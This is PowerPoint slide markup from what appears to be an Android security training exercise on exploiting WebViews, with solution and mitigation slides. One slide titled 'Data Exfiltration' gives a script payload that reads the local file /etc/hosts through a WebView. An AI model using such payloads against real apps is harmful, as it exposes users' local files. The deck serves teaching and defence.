            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">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a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="2657045"/>
            <a:ext cx="3886200" cy="561975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"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052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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> 3 : Data Exfiltration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; a = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</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a.open</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GET','file</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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/hosts', false); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.send</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alert</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a.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> us to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>determine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> if the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> Origin Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="14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6 : Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>WebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> [Solution]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2735223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ABF3-298B-4D14-B8E5-C8DDB3A372FB}"/>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a:t>Exercice 6 : Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>WebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> [Solution]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34EDE7BD-DC63-4141-BDAD-C18217118D53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="8646" t="13330" r="63021" b="8486"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3374858" y="1713376"/>
            <a:ext cx="2590800" cy="4783016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"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90A949-D93A-2165-FE8B-58FD4FD8CB15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="1230833"/>
            <a:ext cx="4576354" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Local file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27663845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400" b="1" dirty="0"/>
              <a:t>Mitigation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Recommendations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>favor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>TextViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>WebViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>, XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> not possible on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>TextViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> must use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Webviews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>disable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> settings as possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>especially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>, all file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> options and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>strictly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>functionality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>Leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" u="sng" dirty="0"/>
              <a:t> the minimum settings possible for the application to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>Output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>encode user input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>prior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> to rendering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Webview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Avoid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> DOM XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>sinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>much</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> as possible, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>otherwise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>sanitize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> user input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>prior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>assigning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> to a DOM XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>sink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> (i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>, location, href, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>additional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> mitigation guidance, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>please</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>OWASP XSS Prevention </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Cheat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="14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313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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Mitigation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Recommendations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>SafeBrowsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> API</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developers.google.com/safe-browsing/v4</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.android.com/training/safetynet/safebrowsing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1"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Exercice 6 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>WebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Remediation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"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ool&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DB72C8-68AE-44EB-8C95-BD0880784DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="21667" r="22639"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3434874" y="4457700"/>
            <a:ext cx="2274252" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71885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dirty="0"/>
              <a:t>And …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2594726" y="2940049"/>
          <a:ext cx="3747381" cy="582930"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3747381">
                  <a:extLst>
